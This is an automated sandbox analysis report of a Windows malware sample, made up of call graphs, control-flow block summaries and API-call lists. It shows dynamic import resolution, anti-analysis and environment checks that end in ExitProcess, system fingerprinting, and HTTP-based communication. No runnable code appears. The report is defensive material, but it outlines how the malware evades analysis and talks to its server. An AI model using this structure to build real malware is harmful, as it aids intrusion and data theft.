28875 13fe98 StrCmpCA 28875->28827 28875->28879 28876 13fbab lstrcpy 28876->28879 28877 13fec9 lstrcpy 28877->28879 28878 13f070 28 API calls 28878->28879 28879->28823 28879->28824 28879->28825 28879->28827 28879->28830 28879->28834 28879->28860 28879->28865 28879->28866 28879->28871 28879->28872 28879->28874 28879->28875 28879->28876 28879->28877 28879->28878 28880 13fbf9 lstrcpy 28879->28880 28881 13ff1a lstrcpy 28879->28881 28880->28879 28881->28879 28882->27906 28884 142955 28883->28884 28885 14295c GetVolumeInformationA 28883->28885 28884->28885 28886 1429bc GetProcessHeap RtlAllocateHeap 28885->28886 28888 1429f6 wsprintfA 28886->28888 28889 1429f2 28886->28889 28888->28889 29106 1473f0 28889->29106 28893 124c70 28892->28893 28894 124c85 28893->28894 28895 124c7d lstrcpy 28893->28895 29110 124bc0 28894->29110 28895->28894 28897 124c90 28898 124ccc lstrcpy 28897->28898 28899 124cd8 28897->28899 28898->28899 28900 124cff lstrcpy 28899->28900 28901 124d0b 28899->28901 28900->28901 28902 124d2f lstrcpy 28901->28902 28903 124d3b 28901->28903 28902->28903 28904 124d6d lstrcpy 28903->28904 28905 124d79 28903->28905 28904->28905 28905->28905 28906 124da0 lstrcpy 28905->28906 28907 124dac InternetOpenA StrCmpCA 28905->28907 28906->28907 28908 124de0 28907->28908 28909 1254b8 InternetCloseHandle CryptStringToBinaryA 28908->28909 29114 144040 28908->29114 28910 1254e8 LocalAlloc 28909->28910 28927 1255d8 28909->28927 28912 1254ff CryptStringToBinaryA 28910->28912 28910->28927 28913 125517 LocalFree 28912->28913 28914 125529 lstrlen 28912->28914 28913->28927 28915 12553d 28914->28915 28917 125563 lstrlen 28915->28917 28918 125557 lstrcpy 28915->28918 28916 124dfa 28919 124e23 lstrcpy lstrcat 28916->28919 28920 124e38 28916->28920 28922 12557d 28917->28922 28918->28917 28919->28920 28921 124e5a lstrcpy 28920->28921 28924 124e62 28920->28924 28921->28924 28923 12558f lstrcpy lstrcat 28922->28923 28925 1255a2 28922->28925 28923->28925 28926 124e71 lstrlen 28924->28926 28929 
1255d1 28925->28929 28930 1255c9 lstrcpy 28925->28930 28928 124e89 28926->28928 28927->27935 28931 124e95 lstrcpy lstrcat 28928->28931 28932 124eac 28928->28932 28929->28927 28930->28929 28931->28932 28933 124ed5 28932->28933 28934 124ecd lstrcpy 28932->28934 28935 124edc lstrlen 28933->28935 28934->28933 28936 124ef2 28935->28936 28937 124efe lstrcpy lstrcat 28936->28937 28938 124f15 28936->28938 28937->28938 28939 124f36 lstrcpy 28938->28939 28940 124f3e 28938->28940 28939->28940 28941 124f65 lstrcpy lstrcat 28940->28941 28942 124f7b 28940->28942 28941->28942 28943 124fa4 28942->28943 28944 124f9c lstrcpy 28942->28944 28945 124fab lstrlen 28943->28945 28944->28943 28946 124fc1 28945->28946 28947 124fcd lstrcpy lstrcat 28946->28947 28948 124fe4 28946->28948 28947->28948 28949 12500d 28948->28949 28950 125005 lstrcpy 28948->28950 28951 125014 lstrlen 28949->28951 28950->28949 28952 12502a 28951->28952 28953 125036 lstrcpy lstrcat 28952->28953 28954 12504d 28952->28954 28953->28954 28955 125079 28954->28955 28956 125071 lstrcpy 28954->28956 28957 125080 lstrlen 28955->28957 28956->28955 28958 12509b 28957->28958 28959 1250ac lstrcpy lstrcat 28958->28959 28960 1250bc 28958->28960 28959->28960 28961 1250da lstrcpy lstrcat 28960->28961 28962 1250ed 28960->28962 28961->28962 28963 12510b lstrcpy 28962->28963 28964 125113 28962->28964 28963->28964 28965 125121 InternetConnectA 28964->28965 28965->28909 28966 125150 HttpOpenRequestA 28965->28966 28967 1254b1 InternetCloseHandle 28966->28967 28968 12518b 28966->28968 28967->28909 29121 147520 lstrlen 28968->29121 28972 1251a4 29129 1474d0 28972->29129 28975 147490 lstrcpy 28976 1251c0 28975->28976 28977 147520 3 API calls 28976->28977 28978 1251d5 28977->28978 28979 147490 lstrcpy 28978->28979 28980 1251de 28979->28980 28981 147520 3 API calls 28980->28981 28982 1251f4 28981->28982 28983 147490 lstrcpy 28982->28983 28984 1251fd 28983->28984 28985 147520 3 API calls 28984->28985 28986 125213 28985->28986 28987 147490 
lstrcpy 28986->28987 28988 12521c 28987->28988 28989 147520 3 API calls 28988->28989 28990 125231 28989->28990 28991 147490 lstrcpy 28990->28991 28992 12523a 28991->28992 28993 1474d0 2 API calls 28992->28993 28994 12524d 28993->28994 28995 147490 lstrcpy 28994->28995 28996 125256 28995->28996 28997 147520 3 API calls 28996->28997 28998 12526b 28997->28998 28999 147490 lstrcpy 28998->28999 29000 125274 28999->29000 29001 147520 3 API calls 29000->29001 29002 125289 29001->29002 29003 147490 lstrcpy 29002->29003 29004 125292 29003->29004 29005 1474d0 2 API calls 29004->29005 29006 1252a5 29005->29006 29007 147490 lstrcpy 29006->29007 29008 1252ae 29007->29008 29009 147520 3 API calls 29008->29009 29010 1252c3 29009->29010 29011 147490 lstrcpy 29010->29011 29012 1252cc 29011->29012 29013 147520 3 API calls 29012->29013 29014 1252e2 29013->29014 29015 147490 lstrcpy 29014->29015 29016 1252eb 29015->29016 29017 147520 3 API calls 29016->29017 29018 125301 29017->29018 29019 147490 lstrcpy 29018->29019 29020 12530a 29019->29020 29021 147520 3 API calls 29020->29021 29022 12531f 29021->29022 29023 147490 lstrcpy 29022->29023 29024 125328 29023->29024 29025 1474d0 2 API calls 29024->29025 29026 12533b 29025->29026 29027 147490 lstrcpy 29026->29027 29028 125344 29027->29028 29029 125370 lstrcpy 29028->29029 29030 12537c 29028->29030 29029->29030 29031 1474d0 2 API calls 29030->29031 29032 12538a 29031->29032 29033 1474d0 2 API calls 29032->29033 29034 125397 29033->29034 29035 147490 lstrcpy 29034->29035 29036 1253a1 29035->29036 29037 1253b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 29036->29037 29038 12549c InternetCloseHandle 29037->29038 29042 1253f2 29037->29042 29040 1254ae 29038->29040 29039 1253fd lstrlen 29039->29042 29040->28967 29041 12542e lstrcpy lstrcat 29041->29042 29042->29038 29042->29039 29042->29041 29043 125473 29042->29043 29044 12546b lstrcpy 29042->29044 29045 12547a InternetReadFile 29043->29045 29044->29043 29045->29038 29045->29042 29047 
138e16 ExitProcess 29046->29047 29062 138e1d 29046->29062 29048 139032 29048->27937 29049 138e56 lstrlen 29049->29062 29050 138ed4 StrCmpCA 29050->29062 29051 138ef4 StrCmpCA 29051->29062 29052 138fd8 lstrlen 29052->29062 29053 138fbf StrCmpCA 29053->29062 29054 138e80 lstrlen 29054->29062 29055 138fa6 StrCmpCA 29055->29062 29056 138eaa lstrlen 29056->29062 29057 138f0d StrCmpCA 29057->29062 29058 138f2d StrCmpCA 29058->29062 29059 138f4d StrCmpCA 29059->29062 29060 138f6d StrCmpCA 29060->29062 29061 138f8d StrCmpCA 29061->29062 29062->29048 29062->29049 29062->29050 29062->29051 29062->29052 29062->29053 29062->29054 29062->29055 29062->29056 29062->29057 29062->29058 29062->29059 29062->29060 29062->29061 29063 13900b lstrcpy 29062->29063 29063->29062 29064->27943 29065->27945 29066->27951 29067->27953 29068->27959 29069->27961 29070->27967 29071->27971 29072->27977 29073->27979 29074->27983 29075->27997 29076->28001 29077->28000 29078->27996 29079->28000 29080->28015 29081->28003 29082->28004 29083->28008 29084->28011 29085->28017 29086->28023 29087->28026 29088->28033 29089->28054 29090->28058 29091->28057 29092->28053 29093->28057 29094->28067 29097 12161f 29096->29097 29098 12162b lstrcpy 29097->29098 29099 121633 29097->29099 29098->29099 29100 12164d lstrcpy 29099->29100 29101 121655 29099->29101 29100->29101 29102 12166f lstrcpy 29101->29102 29103 121677 29101->29103 29102->29103 29104 121699 29103->29104 29105 121691 lstrcpy 29103->29105 29104->28789 29105->29104 29107 1473f6 29106->29107 29108 142a30 29107->29108 29109 14740c lstrcpy 29107->29109 29108->27932 29109->29108 29111 124bd0 29110->29111 29111->29111 29112 124bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 29111->29112 29113 124c41 29112->29113 29113->28897 29115 144053 29114->29115 29116 14406f lstrcpy 29115->29116 29117 14407b 29115->29117 29116->29117 29118 1440a5 GetSystemTime 29117->29118 29119 14409d lstrcpy 29117->29119 29120 1440c3 29118->29120 29119->29118 29120->28916 
29123 14753d 29121->29123 29122 12519b 29125 147490 29122->29125 29123->29122 29124 14754d lstrcpy lstrcat 29123->29124 29124->29122 29126 14749c 29125->29126 29127 1474c4 29126->29127 29128 1474bc lstrcpy 29126->29128 29127->28972 29128->29127 29131 1474ec 29129->29131 29130 1251b7 29130->28975 29131->29130 29132 1474fd lstrcpy lstrcat 29131->29132 29132->29130 29196 1433c0 GetSystemInfo wsprintfA 29160 138dca 16 API calls 29170 13c649 ShellExecuteEx 29154 14a490 __CxxFrameHandler 29171 143270 GetSystemPowerStatus 29189 142b70 GetCurrentProcess IsWow64Process 29143 1324f9 298 API calls 29135 128c79 strlen 29190 121b64 162 API calls 29197 12bbf9 90 API calls 29161 142de0 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 29162 1325e9 290 API calls 29136 125869 57 API calls

                            Control-flow Graph

                            APIs
                            • GetProcAddress.KERNEL32(75900000,013E6548), ref: 00146905
                            • GetProcAddress.KERNEL32(75900000,013E6568), ref: 0014691D
                            • GetProcAddress.KERNEL32(75900000,013F94F0), ref: 00146936
                            • GetProcAddress.KERNEL32(75900000,013F9520), ref: 0014694E
                            • GetProcAddress.KERNEL32(75900000,013FD5B0), ref: 00146966
                            • GetProcAddress.KERNEL32(75900000,013FD628), ref: 0014697F
                            • GetProcAddress.KERNEL32(75900000,013EBD00), ref: 00146997
                            • GetProcAddress.KERNEL32(75900000,013FD580), ref: 001469AF
                            • GetProcAddress.KERNEL32(75900000,013FD688), ref: 001469C8
                            • GetProcAddress.KERNEL32(75900000,013FD670), ref: 001469E0
                            • GetProcAddress.KERNEL32(75900000,013FD640), ref: 001469F8
                            • GetProcAddress.KERNEL32(75900000,013E6288), ref: 00146A11
                            • GetProcAddress.KERNEL32(75900000,013E6628), ref: 00146A29
                            • GetProcAddress.KERNEL32(75900000,013E6488), ref: 00146A41
                            • GetProcAddress.KERNEL32(75900000,013E64A8), ref: 00146A5A
                            • GetProcAddress.KERNEL32(75900000,013FD6A0), ref: 00146A72
                            • GetProcAddress.KERNEL32(75900000,013FD6D0), ref: 00146A8A
                            • GetProcAddress.KERNEL32(75900000,013EBD28), ref: 00146AA3
                            • GetProcAddress.KERNEL32(75900000,013E64E8), ref: 00146ABB
                            • GetProcAddress.KERNEL32(75900000,013FD6B8), ref: 00146AD3
                            • GetProcAddress.KERNEL32(75900000,013FD6E8), ref: 00146AEC
                            • GetProcAddress.KERNEL32(75900000,013FD5E0), ref: 00146B04
                            • GetProcAddress.KERNEL32(75900000,013FD658), ref: 00146B1C
                            • GetProcAddress.KERNEL32(75900000,013E6648), ref: 00146B35
                            • GetProcAddress.KERNEL32(75900000,013FD700), ref: 00146B4D
                            • GetProcAddress.KERNEL32(75900000,013FD550), ref: 00146B65
                            • GetProcAddress.KERNEL32(75900000,013FD568), ref: 00146B7E
                            • GetProcAddress.KERNEL32(75900000,013FD5F8), ref: 00146B96
                            • GetProcAddress.KERNEL32(75900000,013FD598), ref: 00146BAE
                            • GetProcAddress.KERNEL32(75900000,013FD5C8), ref: 00146BC7
                            • GetProcAddress.KERNEL32(75900000,013FD610), ref: 00146BDF
                            • GetProcAddress.KERNEL32(75900000,013FD1C0), ref: 00146BF7
                            • GetProcAddress.KERNEL32(75900000,013FD1A8), ref: 00146C10
                            • GetProcAddress.KERNEL32(75900000,013FA550), ref: 00146C28
                            • GetProcAddress.KERNEL32(75900000,013FD028), ref: 00146C40
                            • GetProcAddress.KERNEL32(75900000,013FD0A0), ref: 00146C59
                            • GetProcAddress.KERNEL32(75900000,013E62A8), ref: 00146C71
                            • GetProcAddress.KERNEL32(75900000,013FD088), ref: 00146C89
                            • GetProcAddress.KERNEL32(75900000,013E62C8), ref: 00146CA2
                            • GetProcAddress.KERNEL32(75900000,013FD040), ref: 00146CBA
                            • GetProcAddress.KERNEL32(75900000,013FD208), ref: 00146CD2
                            • GetProcAddress.KERNEL32(75900000,013E6308), ref: 00146CEB
                            • GetProcAddress.KERNEL32(75900000,013E6328), ref: 00146D03
                            • LoadLibraryA.KERNEL32(013FD118,001406EF), ref: 00146D15
                            • LoadLibraryA.KERNEL32(013FD220), ref: 00146D26
                            • LoadLibraryA.KERNEL32(013FD148), ref: 00146D38
                            • LoadLibraryA.KERNEL32(013FD238), ref: 00146D4A
                            • LoadLibraryA.KERNEL32(013FD190), ref: 00146D5B
                            • LoadLibraryA.KERNEL32(013FD100), ref: 00146D6D
                            • LoadLibraryA.KERNEL32(013FD058), ref: 00146D7F
                            • LoadLibraryA.KERNEL32(013FD070), ref: 00146D90
                            • GetProcAddress.KERNEL32(75FD0000,013E6A08), ref: 00146DAC
                            • GetProcAddress.KERNEL32(75FD0000,013FD1D8), ref: 00146DC4
                            • GetProcAddress.KERNEL32(75FD0000,013F9168), ref: 00146DDD
                            • GetProcAddress.KERNEL32(75FD0000,013FD0E8), ref: 00146DF5
                            • GetProcAddress.KERNEL32(75FD0000,013E6728), ref: 00146E0D
                            • GetProcAddress.KERNEL32(734B0000,013EB968), ref: 00146E2D
                            • GetProcAddress.KERNEL32(734B0000,013E6708), ref: 00146E45
                            • GetProcAddress.KERNEL32(734B0000,013EB6C0), ref: 00146E5E
                            • GetProcAddress.KERNEL32(734B0000,013FD1F0), ref: 00146E76
                            • GetProcAddress.KERNEL32(734B0000,013FCFC8), ref: 00146E8E
                            • GetProcAddress.KERNEL32(734B0000,013E67C8), ref: 00146EA7
                            • GetProcAddress.KERNEL32(734B0000,013E6848), ref: 00146EBF
                            • GetProcAddress.KERNEL32(734B0000,013FD010), ref: 00146ED7
                            • GetProcAddress.KERNEL32(763B0000,013E69E8), ref: 00146EF3
                            • GetProcAddress.KERNEL32(763B0000,013E66A8), ref: 00146F0B
                            • GetProcAddress.KERNEL32(763B0000,013FCF98), ref: 00146F24
                            • GetProcAddress.KERNEL32(763B0000,013FD0B8), ref: 00146F3C
                            • GetProcAddress.KERNEL32(763B0000,013E6688), ref: 00146F54
                            • GetProcAddress.KERNEL32(750F0000,013EBAD0), ref: 00146F74
                            • GetProcAddress.KERNEL32(750F0000,013EB6E8), ref: 00146F8C
                            • GetProcAddress.KERNEL32(750F0000,013FCF50), ref: 00146FA5
                            • GetProcAddress.KERNEL32(750F0000,013E6868), ref: 00146FBD
                            • GetProcAddress.KERNEL32(750F0000,013E6968), ref: 00146FD5
                            • GetProcAddress.KERNEL32(750F0000,013EB9B8), ref: 00146FEE
                            • GetProcAddress.KERNEL32(75A50000,013FCF68), ref: 0014700E
                            • GetProcAddress.KERNEL32(75A50000,013E67E8), ref: 00147026
                            • GetProcAddress.KERNEL32(75A50000,013F90B8), ref: 0014703F
                            • GetProcAddress.KERNEL32(75A50000,013FCF80), ref: 00147057
                            • GetProcAddress.KERNEL32(75A50000,013FCFB0), ref: 0014706F
                            • GetProcAddress.KERNEL32(75A50000,013E66C8), ref: 00147088
                            • GetProcAddress.KERNEL32(75A50000,013E68E8), ref: 001470A0
                            • GetProcAddress.KERNEL32(75A50000,013FCFE0), ref: 001470B8
                            • GetProcAddress.KERNEL32(75A50000,013FCFF8), ref: 001470D1
                            • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 001470E7
                            • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 001470FE
                            • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 00147115
                            • GetProcAddress.KERNEL32(75070000,013E6808), ref: 00147131
                            • GetProcAddress.KERNEL32(75070000,013FD0D0), ref: 00147149
                            • GetProcAddress.KERNEL32(75070000,013FD130), ref: 00147162
                            • GetProcAddress.KERNEL32(75070000,013FD160), ref: 0014717A
                            • GetProcAddress.KERNEL32(75070000,013FD178), ref: 00147192
                            • GetProcAddress.KERNEL32(74E50000,013E6988), ref: 001471AE
                            • GetProcAddress.KERNEL32(74E50000,013E6928), ref: 001471C6
                            • GetProcAddress.KERNEL32(75320000,013E6828), ref: 001471E2
                            • GetProcAddress.KERNEL32(75320000,013FD3E8), ref: 001471FA
                            • GetProcAddress.KERNEL32(6F060000,013E6888), ref: 0014721A
                            • GetProcAddress.KERNEL32(6F060000,013E6948), ref: 00147232
                            • GetProcAddress.KERNEL32(6F060000,013E6768), ref: 0014724B
                            • GetProcAddress.KERNEL32(6F060000,013FD418), ref: 00147263
                            • GetProcAddress.KERNEL32(6F060000,013E68C8), ref: 0014727B
                            • GetProcAddress.KERNEL32(6F060000,013E68A8), ref: 00147294
                            • GetProcAddress.KERNEL32(6F060000,013E6748), ref: 001472AC
                            • GetProcAddress.KERNEL32(6F060000,013E6908), ref: 001472C4
                            • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 001472DB
                            • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 001472F2
                            • GetProcAddress.KERNEL32(74E00000,013FD4D8), ref: 0014730E
                            • GetProcAddress.KERNEL32(74E00000,013F91E8), ref: 00147326
                            • GetProcAddress.KERNEL32(74E00000,013FD4C0), ref: 0014733F
                            • GetProcAddress.KERNEL32(74E00000,013FD4A8), ref: 00147357
                            • GetProcAddress.KERNEL32(74DF0000,013E69A8), ref: 00147373
                            • GetProcAddress.KERNEL32(6E340000,013FD430), ref: 0014738F
                            • GetProcAddress.KERNEL32(6E340000,013E69C8), ref: 001473A7
                            • GetProcAddress.KERNEL32(6E340000,013FD268), ref: 001473C0
                            • GetProcAddress.KERNEL32(6E340000,013FD280), ref: 001473D8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 077d3ea948b70061867f63ed4c573da6f3899bac19ba88b07cd1a697fc03f612
                            • Instruction ID: 356c8ba17b2237c9b356a06c3f24407d12a6366f645af2ad913305b9d80930c3
                            • Opcode Fuzzy Hash: 077d3ea948b70061867f63ed4c573da6f3899bac19ba88b07cd1a697fc03f612
                            • Instruction Fuzzy Hash: 4D622BB5611340EFD756DF64FC89A2677BEF78C703B10891AE956932B4DB34A800EB60
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00124C7F
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124CD2
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124D05
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124D35
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124D73
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00124DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00124DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 771fba8224ca057402f30ee7d069c0cf1c6ead0cf7f6ae30d8c086901c763fa3
                            • Instruction ID: 534a209c69069d64c8574496759b2726cdda0d5d651fdd9f6cdb3b0fb737384f
                            • Opcode Fuzzy Hash: 771fba8224ca057402f30ee7d069c0cf1c6ead0cf7f6ae30d8c086901c763fa3
                            • Instruction Fuzzy Hash: 21529131901636ABDB21EFB4EC85BAE7BB9AF14305F181425F805AB261DB34DD52CBD0

                            Control-flow Graph

                            • Control-flow graph image not rendered. Recovered basic blocks of function 1465a0: 1465a0-1465cd GetPEB; 1465d3-1467ce call 146500, GetProcAddress * 20; 1467d3-146833 LoadLibraryA * 5; then a chain of conditional GetProcAddress lookups (146835-146843, 146851-146877 * 2, 146885-146893, 1468a1-1468af, 1468bd-1468e2 * 2) ending at 1468e7-1468ea.
                            APIs
                            • GetProcAddress.KERNEL32(75900000,013F1538), ref: 001465F9
                            • GetProcAddress.KERNEL32(75900000,013F15B0), ref: 00146612
                            • GetProcAddress.KERNEL32(75900000,013F15F8), ref: 0014662A
                            • GetProcAddress.KERNEL32(75900000,013F15C8), ref: 00146642
                            • GetProcAddress.KERNEL32(75900000,013F91A8), ref: 0014665B
                            • GetProcAddress.KERNEL32(75900000,013E6588), ref: 00146673
                            • GetProcAddress.KERNEL32(75900000,013E6428), ref: 0014668B
                            • GetProcAddress.KERNEL32(75900000,013F1640), ref: 001466A4
                            • GetProcAddress.KERNEL32(75900000,013F1610), ref: 001466BC
                            • GetProcAddress.KERNEL32(75900000,013F1628), ref: 001466D4
                            • GetProcAddress.KERNEL32(75900000,013F1550), ref: 001466ED
                            • GetProcAddress.KERNEL32(75900000,013E65A8), ref: 00146705
                            • GetProcAddress.KERNEL32(75900000,013F1568), ref: 0014671D
                            • GetProcAddress.KERNEL32(75900000,013F1658), ref: 00146736
                            • GetProcAddress.KERNEL32(75900000,013E6508), ref: 0014674E
                            • GetProcAddress.KERNEL32(75900000,013F1670), ref: 00146766
                            • GetProcAddress.KERNEL32(75900000,013F1718), ref: 0014677F
                            • GetProcAddress.KERNEL32(75900000,013E65E8), ref: 00146797
                            • GetProcAddress.KERNEL32(75900000,013F1760), ref: 001467AF
                            • GetProcAddress.KERNEL32(75900000,013E63A8), ref: 001467C8
                            • LoadLibraryA.KERNEL32(013F17C0,?,?,?,00141DD3), ref: 001467D9
                            • LoadLibraryA.KERNEL32(013F1730,?,?,?,00141DD3), ref: 001467EB
                            • LoadLibraryA.KERNEL32(013F1778,?,?,?,00141DD3), ref: 001467FD
                            • LoadLibraryA.KERNEL32(013F17D8,?,?,?,00141DD3), ref: 0014680E
                            • LoadLibraryA.KERNEL32(013F1748,?,?,?,00141DD3), ref: 00146820
                            • GetProcAddress.KERNEL32(75070000,013F1790), ref: 0014683D
                            • GetProcAddress.KERNEL32(75FD0000,013F17A8), ref: 00146859
                            • GetProcAddress.KERNEL32(75FD0000,013F95E0), ref: 00146871
                            • GetProcAddress.KERNEL32(75A50000,013F9628), ref: 0014688D
                            • GetProcAddress.KERNEL32(74E50000,013E65C8), ref: 001468A9
                            • GetProcAddress.KERNEL32(76E80000,013F9248), ref: 001468C5
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 001468DC
                            Strings
                            • NtQueryInformationProcess, xrefs: 001468D1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: c1508b6a8c81494cea16b71ca03f1a4b6cdad7b93dec04a6c91c7df78e58a6c3
                            • Instruction ID: 4f08a196f0c44c21360dd5a0f2dad2d41f6952898fac71952f9b9073ff9a76a3
                            • Opcode Fuzzy Hash: c1508b6a8c81494cea16b71ca03f1a4b6cdad7b93dec04a6c91c7df78e58a6c3
                            • Instruction Fuzzy Hash: FFA12BB5A11340DFD756DF64ED89B263BBDF788742B00891AE916933B4DB34A900DB60

                            Control-flow Graph

                            • Control-flow graph image not rendered. Recovered basic blocks of function 141dc0: 141dc0-141ddb call 122a90, call 1465a0; 141de0-141de8 (self-looping); 141dea-141df7 call 122930 with optional lstrcpy (141df9-141dff); 141e05-141e33 branching to ExitProcess (141e35-141e37) or GetSystemInfo (141e3d-141e4b), which in turn branches to ExitProcess (141e4d-141e4f) or 141e55-141e70 call 121030, call 1210c0, GetUserDefaultLangID; optional ExitProcess (141e80-141e82); 141e88-141e9a call 142ca0, call 143fe0; optional 141e9c-141eae call 142c10, call 143fe0 with its own ExitProcess exit (141eb0-141eb1); five string-building blocks (141eb7, 141ef3, 141f2a with call 142ca0, 141f6a, 141f9e with call 142c10), each doing lstrlen and call 122930 with an optional lstrcpy/lstrcat path; 141fda-141fdf with optional call 122a20 (141fe1); 141fe6-141ff2 call 122930 with optional lstrcpy (141ff8-141ffa); 142000-142036 call 122a20 * 5, OpenEventA; 142038-14205a CloseHandle, Sleep, OpenEventA (self-looping); 14205c-142070 CreateEventA, call 141cf0, call 1401a0; 142075-14207e CloseHandle, ExitProcess.
                            APIs
                              • Part of subcall function 001465A0: GetProcAddress.KERNEL32(75900000,013F1538), ref: 001465F9
